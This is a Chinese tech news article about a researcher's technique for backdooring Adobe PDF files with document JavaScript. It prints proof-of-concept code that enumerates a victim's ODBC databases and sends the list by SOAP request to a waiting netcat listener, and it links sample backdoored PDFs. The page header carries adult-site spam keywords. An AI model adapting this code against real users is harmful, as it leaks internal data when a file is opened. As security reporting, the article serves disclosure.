中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

黑客發(fā)現Adobe PDF的后門

2018-06-11    來源:

容器云強勢上線!快速搭建集群,上萬Linux鏡像隨意使用

一名英國安全研究者近日發(fā)現了一個可以操縱Adobe PDF文件中的合法特性開啟后門進行攻擊的方法。David Kierznowski是一名網絡應用程序測試方面的的入侵測試專家,他發(fā)布了一些理論上已經證實的代碼和一些作弊的PDF文件以演示Adobe Reader程序如何可以在不經過用戶操作的情況下被用于發(fā)起攻擊。

Kierznowski說,乍看起來PDF文檔顯然是不安全的,這是因為它支持JavaScript腳本。然而,要想將這一特性用于攻擊目的卻需要一些巧妙的技術,絕不是像想象的那樣簡單。Adobe支持其自己的JavaScript對象模型,例如,"alert('xss')"必須被app對象調用,因此這變成了"app.alert('xss')"。這意味著利用JavaScript進行攻擊時只能使用Adobe所支持的功能。其次,Adobe Reader和Adobe Professional所允許的JavaScript對象范圍是不同的。Kierznowski在其網站上給出了兩個實例以表明Adobe Professional和Adobe Reader如何可被用于后門攻擊,兩個例子都使用了"Page Open"(頁面打開)事件,這一事件可以通過"Page Properties|Actions tab"(頁面屬性|動作標簽)訪問。

第一個攻擊(PDF文件:http://michaeldaw.org/projects/backdoored1.pdf)同時影響Adobe Reader和Adobe Professional,它已在打過所有補丁的Adobe版本中證實,它由在一個PDF文件中加入的惡意鏈接引發(fā)。一旦該文檔被打開,用戶的瀏覽器便被自動開啟并訪問這一內嵌的鏈接。Kierznowski說,在Adobe 6和7中,打開這些URL前都沒有給出任何的警告;很明顯,這時任何惡意代碼都可被執(zhí)行。

第二個攻擊(PDF文件:http://michaeldaw.org/projects/backdoored2.pdf)利用了Adobe系統(tǒng)的ADBC(Adobe數據庫連接)和Web服務支持。"該攻擊訪問位于localhost上的Windows ODBC,列舉可用的數據庫并將這一信息通過Web服務發(fā)送到'localhost'。該攻擊可以進一步被用于執(zhí)行數據庫查詢。想象一下,攻擊者可以通過用戶的Web瀏覽器訪問到你的內部數據庫。"他說。Kierznowski在其blog( http://michaeldaw.org/md-hacks/backdooring-pdf-files/)上給出了下面這段理論上被證實的代碼:

var cURL = "http://localhost/";
var cTestString = ""; 

var databaseList = ADBC.getDataSourceList();

var DB = "";
if (databaseList != null) {
for (var i=0; i DB+=databaseList[i].name;
}

cTestString = DB;

var response = SOAP.request( {
cURL: cURL,
oRequest: {
"http://myxmlns/:echoString": {
inputString: cTestString
}
},
cAction: " http://additional-opt/"
});

var result = response["http://no-need/:echoStringResponse"]["return"];

On the server side we get this:
$ ./nc.exe -l -p 80 -v
listening on [any] 80 …
connect to [127.0.0.1] from localhost [127.0.0.1] 1924
POST / HTTP/1.1 
Accept: */*
Content-Type: text/xml; charset=UTF-8
SOAPAction: "http://additional-opt/"
Content-Length: 578
User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)
Host: localhost
Connection: Keep-Alive 
Cache-Control: no-cache

<?xml version="1.0″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:xsi="http://www.w3.org/2001/
XMLSchema-instance"><SOAP-ENV:Body><ns0:echoString SOAP-
ENV:encodingStyle="http://schemas.xmlsoap.org/so 
ap/encoding/" xmlns:ns0="http://myxmlns/"><inputString xsi:type="xsd:string">
MS Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files
dbase1</inputString>
</ns0:echoString> 
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Kierznowski指出,在PDF文件中至少還有其他7個漏洞可被攻擊者用于執(zhí)行惡意代碼。注意到Adobe Acrobat支持"HTML表單"和"文件系統(tǒng)訪問"的使用,他說"如果再進一步發(fā)揮創(chuàng)造力,更簡單的和/或更高級的攻擊可以被放在一起。"Kierznowski在其blog上說他還有一些其他有趣的發(fā)現,其中之一是你可以通過將一個后門Javascript文件讀入一個本地路徑后在所有Adobe Acrobat文件中加入后門。

Kierznowski說他在PDF文件中審查后門的好奇心來對于關于"被動攻擊"概念的著迷。 他在提到內部用戶對周圍的網絡通常表示信任時說:"諸如緩存溢出這樣的主動攻擊技術已經越來越難被發(fā)現和利用……未來的安全攻擊的希望在于Web技術。" 微軟Office應用程序(Word,Excel,Powerpoint)被用于瞬時攻擊的趨勢得以證實后,Kierznowski看到了客戶方攻擊的未來在于挖掘服務的功能。 他說:"這種形式的攻擊只是有效利用用戶信任的圈子操縱其客戶端完成一個特定的功能。"

Adobe產品安全事件相應小組的一名發(fā)言人說,公司已經得知Kierznowski的發(fā)現并正在"積極調查"這一問題。 位于加州圣何塞總部的公司在發(fā)往eWEEK的聲明中說:"如果Adobe證實我們的某個產品將受到安全攻擊的影響,這一安全攻擊的細節(jié)及適當的解決方案將被編檔發(fā)布。"

標簽: 安全 代碼 腳本 漏洞 數據庫 網絡 網站 問題 用戶

版權申明:本站文章部分自網絡,如有侵權,請聯系:west999com@outlook.com
特別注意:本站所有轉載文章言論不代表本站觀點!
本站所提供的圖片等素材,版權歸原作者所有,如需使用,請與原作者聯系。

上一篇:全球垃圾郵件6月至今增三倍 垃圾郵件比例高達90%

下一篇:中國銀聯網站被黑客植入病毒 中毒用戶可能被偷窺